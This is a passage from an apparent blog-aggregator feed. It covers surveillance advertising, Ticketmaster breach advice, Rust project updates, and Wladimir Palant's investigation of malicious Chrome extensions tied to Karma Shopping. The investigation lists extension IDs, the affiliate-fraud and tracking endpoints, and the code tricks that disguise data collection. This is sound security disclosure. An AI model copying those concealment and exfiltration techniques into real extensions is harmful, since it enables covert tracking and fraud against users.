And we’re not done. As a wise man once said, But wait! There’s more! Before you rush to do effective privacy tips or write to your state legislators to support anti-surveillance laws, there’s one more benefit for getting rid of surveillance/personalized advertising. Remember that extra $51 that went away? It didn’t get burned up in a fire just because it didn’t get spent on surveillance advertising. Companies still have it, and they still want to sell you stuff. Without surveillance, they’ll have to look for other ways to spend it. And many of the options are win-win for the customer. In Product is the P all marketers should strive to influence, Mark Ritson points out the marketing wins from incremental product improvements, and that’s the kind of work that often gets ignored in favor of niftier, short-term, surveillance advertising projects. Improving service and pricing are other areas that will will also do better without surveillance advertising contending for budgets. There is a lot of potential gain for a lot of people in getting rid of surveillance advertising, so let’s not waste the opportunity. Don’t worry, we’ll get another Internet dystopia narrative to worry about eventually.

More: stop putting privacy-enhancing technologies in web browsers

Related

Product is the P all marketers should strive to influence If there is one thing I have learned from a thousand customers discussing a hundred different products it’s that the things a company thinks are small are, from a consumer perspective, big. And the grand improvements the company is spending bazillions on are probably of little significance. Finding out from the source what needs to be fixed or changed and then getting it done is the quiet product work of proper marketers. (yes, I linked to this twice.)

Bonus links

Marketers in a dying internet: Why the only option is a return to simplicity With machine-generated content now cluttering the most visible online touchpoints (like the frontpage of Google, or your Facebook timeline), it feels inevitable that consumer behaviors will shift as a result. And so marketers need to change how they reach target audiences.

I attended Google’s creator conversation event, and it turned into a funeral

Is AI advertising going to be too easy for its own good? As Rory Sutherland said, When human beings process a message, we sort of process how much effort and love has gone into the creation of this message and we pay attention to to the message accordingly. It’s costly signaling of a kind.

How Google is Killing Bloggers and Small Publishers – And Why

Exploiting Meta’s Weaknesses, Deceptive Political Ads Thrived on Facebook and Instagram in Run-Up to Election

Ninth Circuit Upholds AADC Ban on “Dark Patterns”

Economist ‘future-proofing’ bid brings back brand advertising and targets students

The Talospace ProjectUpdated Baseline JIT OpenPOWER patches for Firefox 128ESR

I updated the Baseline JIT patches to apply against Firefox 128ESR, though if you use the Mercurial rebase extension (and you should), it will rebase automatically and only one file had to be merged — which it did for me also. Nevertheless, everything is up to date against tip again, and this patchset works fine for both Firefox and Thunderbird. I kept the fix for bug 1912623 because I think Mozilla's fix in bug 1909204 is wrong (or at least suboptimal) and this is faster on systems without working Wasm. Speaking of, I need to get back into porting rr to ppc64le so I can solve those startup crashes.

The Mozilla BlogAfter Ticketmaster’s data breach, it’s time to secure your info

Still in its “anti-hero” era, Ticketmaster has users reeling from a data breach last May, when a hacker group claimed to have stolen data from more than 500 million people.

The breach coincided with Taylor Swift’s Eras Tour, one of the biggest tours ever that just so happened to have one of the most problematic rollouts ever. (So many fans tried to buy presale tickets that Ticketmaster’s system crashed, forcing the company to cancel the general sale — yet bots and scalpers still managed to grab tickets.)

So what do you do after a massive data breach?

Use 2FA

Two-factor-authentication (2FA if you’re into brevity) is a simple and effective way to add an extra layer of security to your logins.

Change old passwords

Look. We get it. “FearlessSwiftie13!” is a pretty solid password. But if you’ve been using it since 2008, it’s time to update it. Make it something less obvious, maybe even use Firefox’s password generator. Don’t re-use passwords. If they’re easy to remember, they’re easy to hack.

Mozilla Monitor

Not to plug our own thing, but Mozilla Monitor does a pretty good job of showing what personal data was actually breached. We recommend the free scan; it’ll tell you  if your phone number, passwords or home address have been leaked and alert you to future breaches, so you can act accordingly and stay in the loop. 

No phish

Because the Ticketmaster data breach was so big, many people’s information could now be in the hands of scammers, who may use the data they got to pose as Ticketmaster or concert venues, to steal even more of your information. Be on the lookout for any emails or texts that seem suspicious or off.

Keep tabs on your statements

Regularly review your credit card statements. Pick a day and make it a habit. Even if you haven’t been part of a headline-making breach, it’s smart – you’ll catch any unfamiliar charges and can report them to your card issuer right away.

Data breaches are no fun, but they do help people snap out of their old (and easily hackable) habits. By using a combination of these steps above and some good ol’-fashioned common sense, you’ll minimize the risk of them happening again. 

Find where your private info is exposed

Get a free scan

The post After Ticketmaster’s data breach, it’s time to secure your info appeared first on The Mozilla Blog.

Mozilla Performance BlogPerformance Testing Newsletter (Q3 Edition)

Welcome to the latest edition of the Performance Testing Newsletter! The PerfTools team empowers engineers with tools to continuously improve the performance of Mozilla products.

Last quarter was MozWeek, and we had a great time meeting a number of you in our PerfTest Regression Workshop – thank you all for joining us, and making it a huge success! If you didn’t get a chance to make it, you can find the slides here, and most of the information from the workshop (including some additional bits) can be found in this documentation page. We will be running this workshop again next MozWeek, along with a more advanced version.

See below for highlights from the changes made in the last quarter.

Highlights

Blog Posts ✍️

Contributors

  • Myeongjun Go [:myeongjun]
  • Mayank Bansal [:mayankleoboy1]

If you have any questions, or are looking to add performance testing for your code component, you can find us in #perftest on Element, or #perf-help on Slack.

The Mozilla BlogThe AI problem we can’t ignore

In August 2020, as the pandemic confined people to their homes, the U.K. canceled A-level exams and turned to an algorithm to calculate grades, key for university admissions. Based on historical data that reflected the resource advantages of private schools, the algorithm disproportionately downgraded state students. Those who attended private schools, meanwhile, received inflated grades. News of the results set off widespread backlash. The system reinforced social inequities, critics said.

This isn’t just a one-off mistake – it’s a sign of AI bias creeping into our lives, according to Gemma Galdon-Clavell, a tech policy expert and one of Mozilla’s 2025 Rise25 honorees. Whether it’s deciding who gets into college or a job, who qualifies for a loan, or how health care is distributed, bias in AI can set back efforts toward a more equitable society.

In an opinion piece for Context by the Thomson Reuters Foundation, Gemma asks us to consider the consequences of not addressing this issue. She argues that bias and fairness are the biggest yet often overlooked threats of AI. You can read her essay here

We chatted with Gemma about her piece below. 

Can you give examples of how AI is already affecting us?

AI is involved in nearly everything — whether you’re applying for a job, seeing a doctor, or applying for housing or benefits. Your resume might be screened by an AI, your wait time at the hospital could be determined by an AI triage system, and decisions about loans or mortgages are often assisted by AI. It’s woven into so many aspects of decision-making, but we don’t always see it.

Why is bias in AI so problematic?

AI systems look for patterns and then replicate them. These patterns are based on majority data, which means that minorities — people who don’t fit the majority patterns — are often disadvantaged. Without specific measures built into AI systems to address this, they will inevitably reinforce existing biases. Bias is probably the most dangerous technical challenge in AI, and it’s not being tackled head-on.

How can we address these issues?

At Eticas, we build software to identify outliers — people who don’t fit into majority patterns. We assess whether these outliers are relevant and make sure they aren’t excluded from positive outcomes. We also run a nonprofit that helps communities affected by biased AI systems. If a community feels they’ve been negatively impacted by an AI system, we work with them to reverse-engineer it, helping them understand how it works and giving them the tools to advocate for fairer systems.

What can someone do if an AI system affects them, but they don’t fully understand how it works?

Unfortunately, not much right now. Often, people don’t even know an AI system made a decision about their lives. And there aren’t many mechanisms in place for contesting those decisions. It’s different from buying a faulty product, where you have recourse. If AI makes a decision you don’t agree with, there’s very little you can do. That’s one of the biggest challenges we need to address — creating systems of accountability for when AI makes mistakes.

You’ve highlighted the challenges. What gives you hope about the future of AI?

The progress of our work on AI auditing! For years now we’ve been showing how there is an alternative AI future, one where AI products are built with trust and safety at heart, where AI audits are seen as proof of responsibility and accountability — and ultimately, safety. I often mention how my work is to build the seatbelts of AI, the pieces that make innovation safer and better. A world where we find non-audited AI as unthinkable as cars without seatbelts or brakes, that’s an AI future worth fighting for.

The post The AI problem we can’t ignore appeared first on The Mozilla Blog.

The Rust Programming Language BlogOctober project goals update

The Rust project is currently working towards a slate of 26 project goals, with 3 of them designed as flagship goals. This post provides selected updates on our progress towards these goals (or, in some cases, lack thereof). The full details for any particular goal are available in its associated tracking issue on the rust-project-goals repository.

Flagship goals

The biggest elements of our goal are solving the "send bound" problem via return-type notation (RTN) and adding support for async closures. This month we made progress towards both. For RTN, @compiler-errors extended the return-type notation landed support for using RTN in self-types like where Self::method(): Send. He also authored a blog post with a call for testing explaining what RTN is and how it works. For async closures, the lang team reached a preliminary consensus on the async Fn syntax, with the understanding that it will also include some "async type" syntax. This rationale was documented in RFC #3710, which is now open for feedback. The team held a design meeting on Oct 23 and @nikomatsakis will be updating the RFC with the conclusions.

We have also been working towards a release of the dynosaur crate that enables dynamic dispatch for traits with async functions. This is intended as a transitionary step before we implement true dynamic dispatch. The next steps are to polish the implementation and issue a public call for testing.

With respect to async drop experiments, @nikomatsakis began reviews. It is expected that reviews will continue for some time as this is a large PR.

Finally, no progress has been made towards async WG reorganization. A meeting was scheduled but deferred. @tmandry is currently drafting an initial proposal.

We have made significant progress on resolving blockers to Linux building on stable. Support for struct fields in the offset_of! macro has been stabilized. The final naming for the "derive-smart-pointer" feature has been decided as #[derive(CoercePointee)]; @dingxiangfei2009 prepared PR #131284 for the rename and is working on modifying the rust-for-linux repository to use the new name. Once that is complete, we will be able to stabilize. We decided to stabilize support for references to statics in constants pointers-refs-to-static feature and are now awaiting a stabilization PR from @dingxiangfei2009.

Rust for Linux (RfL) is one of the major users of the asm-goto feature (and inline assembly in general) and we have been examining various extensions. @nbdd0121 authored a hackmd document detailing RfL's experiences and identifying areas for improvement. This led to two immediate action items: making target blocks safe-by-default (rust-lang/rust#119364) and extending const to support embedded pointers (rust-lang/rust#128464).

Finally, we have been finding an increasing number of stabilization requests at the compiler level, and so @wesleywiser and @davidtwco from the compiler team have started attending meetings to create a faster response. One of the results of that collaboration is RFC #3716, authored by Alice Ryhl, which proposes a method to manage compiler flags that modify the target ABI. Our previous approach has been to create distinct targets for each combination of flags, but the number of flags needed by the kernel make that impractical. Authoring the RFC revealed more such flags than previously recognized, including those that modify LLVM behavior.

The Rust 2024 edition is progressing well and is on track to be released on schedule. The major milestones include preparing to stabilize the edition by November 22, 2024, with the actual stabilization occurring on November 28, 2024. The edition will then be cut to beta on January 3, 2025, followed by an announcement on January 9, 2025, indicating that Rust 2024 is pending release. The final release is scheduled for February 20, 2025.

The priorities for this edition have been to ensure its success without requiring excessive effort from any individual. The team is pleased with the progress, noting that this edition will be the largest since Rust 2015, introducing many new and exciting features. The process has been carefully managed to maintain high standards without the need for high-stress heroics that were common in past editions. Notably, the team has managed to avoid cutting many items from the edition late in the development process, which helps prevent wasted work and burnout.

All priority language items for Rust 2024 have been completed and are ready for release. These include several key issues and enhancements. Additionally, there are three changes to the standard library, several updates to Cargo, and an exciting improvement to rustdoc that will significantly speed up doctests.

This edition also introduces a new style edition for rustfmt, which includes several formatting changes.

The team is preparing to start final quality assurance crater runs. Once these are triaged, the nightly beta for Rust 2024 will be announced, and wider testing will be solicited.

Rust 2024 will be stabilized in nightly in late November 2024, cut to beta on January 3, 2025, and officially released on February 20, 2025. More details about the edition items can be found in the Edition Guide.

Goals with updates

  • camelid has started working on using the new lowering schema for more than just const parameters, which once done will allow the introduction of a min_generic_const_args feature gate.
  • compiler-errors has been working on removing the eval_x methods on Const that do not perform proper normalization and are incompatible with this feature.
  • Posted the September update.
  • Created more automated infrastructure to prepare the October update, utilizing an LLM to summarize updates into one or two sentences for a concise table.
  • No progress has been made on this goal.
  • The goal will be closed as consensus indicates stabilization will not be achieved in this period; it will be revisited in the next goal period.
  • No major updates to report.
  • Preparing a talk for next week's EuroRust has taken away most of the free time.
  • Key developments: With the PR for supporting implied super trait bounds landed (#129499), the current implementation is mostly complete in that it allows most code that should compile, and should reject all code that shouldn't.
  • Further testing is required, with the next steps being improving diagnostics (#131152), and fixing more holes before const traits are added back to core.
  • A working-in-process pull request is available at https://github.com/weihanglo/cargo/pull/66.
  • The use of wasm32-wasip1 as a default sandbox environment is unlikely due to its lack of support for POSIX process spawning, which is essential for various build script use cases.
  • The Autodiff frontend was merged, including over 2k LoC and 30 files, making the remaining diff much smaller.
  • The Autodiff middle-end is likely getting a redesign, moving from a library-based to a pass-based approach for LLVM.
  • Significant progress was made with contributions by @x-hgg-x, improving the resolver test suite in Cargo to check feature unification against a SAT solver.
  • This was followed by porting the test cases that tripped up PubGrub to Cargo's test suite, laying the groundwork to prevent regression on important behaviors when Cargo switches to PubGrub and preparing for fuzzing of features in dependency resolution.
  • The team is working on a consensus for handling generic parameters, with both PRs currently blocked on this issue.
  • Attempted stabilization of -Znext-solver=coherence was reverted due to a hang in nalgebra, with subsequent fixes improving but not fully resolving performance issues.
  • No significant changes to the new solver have been made in the last month.
  • GnomedDev pushed rust-lang/rust#130553, which replaced an old Clippy infrastructure with a faster one (string matching into symbol matching).
  • Inspections into Clippy's type sizes and cache alignment are being started, but nothing fruitful yet.
  • The linting behavior was reverted until an unspecified date.
  • The next steps are to decide on the future of linting and to write the never patterns RFC.
  • The PR https://github.com/rust-lang/crates.io/pull/9423 has been merged.
  • Work on the frontend feature is in progress.
  • Key developments in the 'Scalable Polonius support on nightly' project include fixing test failures due to off-by-one errors from old mid-points, and ongoing debugging of test failures with a focus on automating the tracing work.
  • Efforts have been made to accept variations of issue #47680, with potential adjustments to active loans computation and locations of effects. Amanda has been cleaning up placeholders in the work-in-progress PR #130227.
  • rust-lang/cargo#14404 and rust-lang/cargo#14591 have been addressed.
  • Waiting on time to focus on this in a couple of weeks.
  • Key developments: Added the cases in the issue list to the UI test to reproduce the bug or verify the non-reproducibility.
  • Blockers: null.
  • Help wanted: Help test the deadlock code in the issue list and try to reproduce the issue.
  • Students from the CMU Practicum Project have started writing function contracts that include safety conditions for some unsafe functions in the core library, and verifying that safe abstractions respect those pre-conditions and are indeed safe.
  • Help is needed to write more contracts, integrate new tools, review pull requests, or participate in the repository discussions.
  • Progress has been made in matching rustc suggestion output within annotate-snippets, with most cases now aligned.
  • The focus has been on understanding and adapting different rendering styles for suggestions to fit within annotate-snippets.

Goals without updates

The following goals have not received updates in the last month:

Mozilla ThunderbirdThunderbird for Android 8.0 Takes Flight

Just over two years ago, we announced our plans to bring Thunderbird to Android by taking K-9 Mail under our wing. The journey took a little longer than we had originally anticipated and there was a lot to learn along the way, but the wait is finally over! For all of you who have ever asked “when is Thunderbird for Android coming out?”, the answer is – today! We are excited to announce that the first stable release of Thunderbird for Android is out now, and we couldn’t be prouder of the newest, most mobile member of the Thunderbird family.

Resources

Thanks for Helping Thunderbird for Android Fly

Thank you for being a part of the community and sharing this adventure on Android with us! We’re especially grateful to all of you who have helped us test the beta and release candidate images. Your feedback helped us find and fix bugs, test key features, and polish the stable release. We hope you enjoy using the newest Thunderbird, now and for a long time to come!

The post Thunderbird for Android 8.0 Takes Flight appeared first on The Thunderbird Blog.

Wladimir PalantThe Karma connection in Chrome Web Store

Somebody brought to my attention that the Hide YouTube Shorts extension for Chrome changed hands and turned malicious. I looked into it and could confirm that it contained two undisclosed components: one performing affiliate fraud and the other sending users’ every move to some Amazon cloud server. But that wasn’t all of it: I discovered eleven more extensions written by the same people. Some contained only the affiliate fraud component, some only the user tracking, some both. A few don’t appear to be malicious yet.

While most of these extensions were supposedly developed or bought by a person without any other traces online, one broke this pattern. Karma shopping assistant has been on Chrome Web Store since 2020, the company behind it founded in 2013. This company employs more than 50 people and secured tons of cash in venture capital. Maybe a mistake on my part?

After looking thoroughly this explanation seems unlikely. Not only does Karma share some backend infrastructure and considerable amounts of code with the malicious extensions. Not only does Karma Shopping Ltd. admit to selling users’ browsing profiles in their privacy policy. There is even more tying them together, including a mobile app developed by Karma Shopping Ltd. whereas the identical Chrome extension is supposedly developed by the mysterious evildoer.

Screenshot of the karmanow.com website, with the Karma logo visible and a yellow button “Add to Chrome - It’s Free”

The affected extensions

Most of the extensions in question changed hands relatively recently, the first ones in the summer of 2023. The malicious code has been added immediately after the ownership transfer, with some extensions even requesting additional privileges citing bogus reasons. A few extensions have been developed this year by whoever is behind this.

Some extensions from the latter group don’t have any obvious malicious functionality at this point. If there is tracking, it only covers the usage of the extension’s user interface rather than the entire browsing behavior. This can change at any time of course.

Name Weekly active users Extension ID Malicious functionality
Hide YouTube Shorts 100,000 aljlkinhomaaahfdojalfmimeidofpih Affiliate fraud, browsing profile collection
DarkPDF 40,000 cfemcmeknmapecneeeaajnbhhgfgkfhp Affiliate fraud, browsing profile collection
Sudoku On The Rocks 1,000 dncejofenelddljaidedboiegklahijo Affiliate fraud
Dynamics 365 Power Pane 70,000 eadknamngiibbmjdfokmppfooolhdidc Affiliate fraud, browsing profile collection
Israel everywhere 70 eiccbajfmdnmkfhhknldadnheilniafp
Karma | Online shopping, but better 500,000 emalgedpdlghbkikiaeocoblajamonoh Browsing profile collection
Where is Cookie? 93 emedckhdnioeieppmeojgegjfkhdlaeo
Visual Effects for Google Meet 1,000,000 hodiladlefdpcbemnbbcpclbmknkiaem Affiliate fraud
Quick Stickies 106 ihdjofjnmhebaiaanaeeoebjcgaildmk
Nucleus: A Pomodoro Timer and Website Blocker 20,000 koebbleaefghpjjmghelhjboilcmfpad Affiliate fraud, browsing profile collection
Hidden Airline Baggage Fees 496 kolnaamcekefalgibbpffeccknaiblpi Affiliate fraud
M3U8 Downloader 100,000 pibnhedpldjakfpnfkabbnifhmokakfb Affiliate fraud

Hiding in plain sight

Whoever wrote the malicious code chose not to obfuscate it but to make it blend in with the legitimate functionality of the extension. Clearly, the expectation was that nobody would look at the code too closely. So there is for example this:

if (window.location.href.startsWith("http") ||
    window.location.href.includes("m.youtube.com")) {
  
}

It looks like the code inside the block would only run on YouTube. Only when you stop and consider the logic properly you realize that it runs on every website. In fact, that’s the block wrapping the calls to malicious functions.

The malicious functionality is split between content script and background worker for the same reason, even though it could have been kept in one place. This way each part looks innocuous enough: there is some data collection in the content script, and then it sends a check_shorts message to the background worker. And the background worker “checks shorts” by querying some web server. Together this just happens to send your entire browsing history into the Amazon cloud.

Similarly, there are some complicated checks in the content script which eventually result in a loadPdfTab message to the background worker. The background worker dutifully opens a new tab for that address and, strangely, closes it after 9 seconds. Only when you sort through the layers it becomes obvious that this is actually about adding an affiliate cookie.

And of course there is a bunch of usual complicated conditions, making sure that this functionality is not triggered too soon after installation and generally doesn’t pop up reliably enough that users could trace it back to this extension.

Affiliate fraud functionality

The affiliate fraud functionality is tied to the kra18.com domain. When this functionality is active, the extension will regularly download data from https://www.kra18.com/v1/selectors_list?&ex=90 (90 being the extension ID here, the server accepts eight different extension IDs). That’s a long list containing 6,553 host names:

Screenshot of JSON data displayed in the browser. The selectors key is expanded, twenty domain names like drinkag1.com are visible in the list.

Whenever one of these domains is visited and the moons are aligned in the right order, another request to the server is made with the full address of the page you are on. For example, the extension could request https://www.kra18.com/v1/extension_selectors?u=https://www.tink.de/&ex=90:

Screenshot of JSON data displayed in the browser. There are keys shortsNavButtonSelector, url and others. The url key contains a lengthy URL from awin1.com domain.

The shortsNavButtonSelector key is another red herring, the code only appears to be using it. The important key is url, the address to be opened in order to set the affiliate cookie. And that’s the address sent via loadPdfTab message mentioned before if the extension decides that right now is a good time to collect an affiliate commission.

There are also additional “selectors,” downloaded from https://www.kra18.com/v1/selectors_list_lr?&ex=90. Currently this functionality is only used on the amazon.com domain and will replace some product links with links going through jdoqocy.com domain, again making sure an affiliate commission is collected. That domain is owned by Common Junction LLC, an affiliate marketing company that published a case study on how their partnership with Karma Shopping Ltd. (named Shoptagr Ltd. back then) helped drive profits.

Browsing profile collection

Some of the extensions will send each page visit to https://7ng6v3lu3c.execute-api.us-east-1.amazonaws.com/EventTrackingStage/prod/rest. According to the extension code, this is an Alooma backend. Alooma is a data integration platform which has been acquired by Google a while ago. Data transmitted could look like this:

Screenshot of query string parameters displayed in Developer Tools. The parameters are: token: sBGUbZm3hp, timestamp: 1730137880441, user_id: 90, distinct_id: 7796931211, navigator_language: en-US, referrer: https://www.google.com/, local_time: Mon Oct 28 2024 18:51:20 GMT+0100 (Central European Standard Time), event: page_visit, component: external_extension, external: true, current_url: https://example.com/

Yes, this is sent for each and every page loaded in the browser, at least after you’ve been using the extension for a while. And distinct_id is my immutable user ID here.

But wait, it’s a bit different for the Karma extension. Here you can opt out! Well, that’s only if you are using Firefox because Mozilla is rather strict about unexpected data collection. And if you manage to understand what “User interactions” means on this options page:

Screenshot of an options page with two switches labeled User interactions and URL address. The former is described with the text: Karma is a community of people who are working together to help each other get a great deal. We collect anonymized data about coupon codes, product pricing, and information about Karma is used to contribute back to the community. This data does not contain any personably identifiable information such as names or email addresses, but may include data supplied by the browser such as url address.

Well, I may disagree with the claim that url addresses do not contain personably identifiable information. And: yes, this is the entire page. There really isn’t any more text.

The data transmitted is also somewhat different:

Screenshot of query string parameters displayed in Developer Tools. The parameters are: referrer: https://www.google.com/, current_url: https://example.com/, browser_version: 130, tab_id: 5bd19785-e18e-48ca-b400-8a74bf1e2f32, event_number: 1, browser: chrome, event: page_visit, source: extension, token: sBGUbZm3hp, version: 10.70.0.21414, timestamp: 1730138671937, user_id: 6372998, distinct_id: 6b23f200-2161-4a1d-9400-98805c17b9e3, navigator_language: en-US, local_time: Mon Oct 28 2024 19:04:31 GMT+0100 (Central European Standard Time), ui_config: old_save, save_logic: rules, show_k_button: true, show_coupon_scanner: true, show_popups: true

The user_id field no longer contains the extension ID but my personal identifier, complementing the identifier in distinct_id. There is a tab_id field adding more context, so that it is not only possible to recognize which page I navigated to and from where but also to distinguish different tabs. And some more information about my system is always useful of course.

Who is behind this?

Eleven extensions on my list are supposedly developed by a person going by the name Rotem Shilop or Roni Shilop or Karen Shilop. This isn’t a very common last name, and if this person really exists it managed to leave no traces online. Yes, I also searched in Hebrew. Yet one extension is developed by Karma Shopping Ltd. (formerly Shoptagr Ltd.), a company based in Israel with at least 50 employees. An accidental association?

It doesn’t look like it. I’m not going into the details of shared code and tooling, let’s just say: it’s very obvious that all twelve extensions are being developed by the same people. Of course, there is still the possibility that the eleven malicious extensions are not associated directly with Karma Shopping but with some rogue employee or contractor or business partner.

However, it isn’t only the code. As explained above, five extensions including Karma share the same tracking backend which is found nowhere else. They are even sending the same access token. Maybe this backend isn’t actually run by Karma Shopping and they are only one of the customers of some third party? Yet if you look at the data being sent, clearly the Karma extension is considered first-party. It’s the other extensions which are sending external: true and component: external_extension flags.

Then maybe Karma Shopping is merely buying data from a third party, without actually being affiliated with their extensions? Again, this is possible but unlikely. One indicator is the user_id field in the data sent by these extensions. It’s the same extension ID that they use for internal communication with the kra18.com server. If Karma Shopping were granting a third party access to their server, wouldn’t they assign that third party some IDs of their own?

And those affiliate links produced by the kra18.com server? Some of them clearly mention karmanow.com as the affiliate partner.

Screenshot of JSON data displayed in the browser. url key is a long link pointing to go.skimresources.com. sref query parameter of the link is https://karmanow.com. url query parameter of the link is www.runinrabbit.com.

Finally, if we look at Karma Shopping’s mobile apps, they develop two of them. In addition to the Karma app, the app stores also contain an app called “Sudoku on the Rocks,” developed by Karma Shopping Ltd. Which is a very strange coincidence because an identical “Sudoku on the Rocks” extension also exists in the Chrome Web Store. Here however the developer is Karen Shilop. And Karen Shilop chose to include hidden affiliate fraud functionality in their extension.

By the way, guess who likes the Karma extension a lot and left a five-star review?

Screenshot of a five-star review by Rona Shilop with a generic-looking avatar of woman with a cup of coffee. The review text says: Thanks for making this amazing free extension. There is a reply by Karma Support saying: We’re so happy to hear how much you enjoy shopping with Karma.

I contacted Karma Shopping Ltd. via their public relations address about their relationship to these extensions and the Shilop person but didn’t hear back so far.

Update (2024-10-30): An extension developer told me that they were contacted on multiple independent occasions about selling their Chrome extension to Karma Shopping, each time by C-level executives of the company, from official karmanow.com email addresses. The first outreach was in September 2023, where Karma was supposedly looking into adding extensions to their portfolio as part of their growth strategy. They offered to pay between $0.2 and $1 per weekly active user.

What does Karma Shopping want with the data?

It is obvious why Karma Shopping Ltd. would want to add their affiliate functionality to more extensions. After all, affiliate commissions are their line of business. But why collect browsing histories? Only to publish semi-insightful articles on people’s shopping behavior?

Well, let’s have a look at their privacy policy which is actually meaningful for a change. Under 1.3.4 it says:

Browsing Data. In case you a user of our browser extensions we may collect data regarding web browsing data, which includes web pages visited, clicked stream data and information about the content you viewed.

How we Use this Data. We use this Personal Data (1) in order to provide you with the Services and feature of the extension and (2) we will share this data in an aggregated, anonymized manner, for marketing research and commercial use with our business partners.

Legal Basis. (1) We process this Personal Data for the purpose of providing the Services to you, which is considered performance of a contract with you. (2) When we process and share the aggregated and anonymized data we will ask for your consent.

First of all, this tells us that Karma collecting browsing data is official. They also openly state that they are selling it. Good to know and probably good for their business as well.

As to the legal basis: I am no lawyer but I have a strong impression that they don’t deliver on the “we will ask for your consent” promise. No, not even that Firefox options page qualifies as informed consent. And this makes this whole data collection rather doubtful in the light of GDPR.

There is also a difference between anonymized and pseudonymized data. The data collection seen here is pseudonymized: while it doesn’t include my name, there is a persistent user identifier which is still linked to me. It is usually fairly easy to deanonymize pseudonymized browsing histories, e.g. because people tend to visit their social media profiles rather often.

Actually anonymized data would not allow associating it with any single person. This is very hard to achieve, and we’ve seen promises of aggregated and anonymized data go very wrong. While it’s theoretically possible that Karma correctly anonymizes and aggregates data on the server side, this is a rather unlikely outcome for a company that, as we’ve seen above, confuses the lack of names and email addresses with anonymity.

But of course these considerations only apply to the Karma extension itself. Because related extensions like Hide YouTube Shorts just straight out lie:

Screenshot of a Chrome Web Store listing. Text under the heading Privacy: The developer has disclosed that it will not collect or use your data.

Some of these extensions actually used to have a privacy policy before they were bought. Now only three still have an identical and completely bogus privacy policy. Sudoku on the Rocks happens to be among these three, and the same privacy policy is linked by the Sudoku on the Rocks mobile apps which are officially developed by Karma Shopping Ltd.

This Week In RustThis Week in Rust 571

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is tower-http-client, a library of middlewares and various utilities for HTTP-clients.

Thanks to Aleksey Sidorov for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

447 pull requests were merged in the last week

Rust Compiler Performance Triage

This week saw a lot of activity both on the regressions and improvements side. There was one large regression, which was immediately reverted. Overall, the week ended up being positive, thanks to a rollup PR that caused a tiny improvement to almost all benchmarks.

Triage done by @kobzol. Revision range: 3e33bda0..c8a8c820

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
0.7% [0.2%, 2.7%] 15
Regressions ❌
(secondary)
0.8% [0.1%, 1.6%] 22
Improvements ✅
(primary)
-0.6% [-1.5%, -0.2%] 153
Improvements ✅
(secondary)
-0.7% [-1.9%, -0.1%] 80
All ❌✅ (primary) -0.5% [-1.5%, 2.7%] 168

6 Regressions, 6 Improvements, 4 Mixed; 6 of them in rollups 58 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-10-30 - 2024-11-27 🦀

Virtual
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

An earnest effort to pursue [P1179R1] as a Lifetime TS[P3465R0] will compromise on C++’s outdated and unworkable core principles and adopt mechanisms more like Rust’s. In the compiler business this is called carcinization: a tendency of non-crab organisms to evolve crab-like features. – Sean Baxter on circle-lang.org

Thanks to Collin Richards for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Firefox Developer ExperienceFirefox WebDriver Newsletter 132

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 132 release cycle.

Contributions

Firefox – including our WebDriver implementation – is developed as an open source project, and everyone is welcome to contribute. If you ever wanted to contribute to an open source project used by millions of users, or are interested in some experience in software development, jump in.

We are always grateful to receive external contributions, here are the ones which made it in Firefox 132:

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for Marionette, or the list of mentored JavaScript bugs for WebDriver BiDi.

WebDriver BiDi

Retry commands to avoid AbortError failures

In release 132, one of our primary focus areas was enhancing the reliability of command execution.

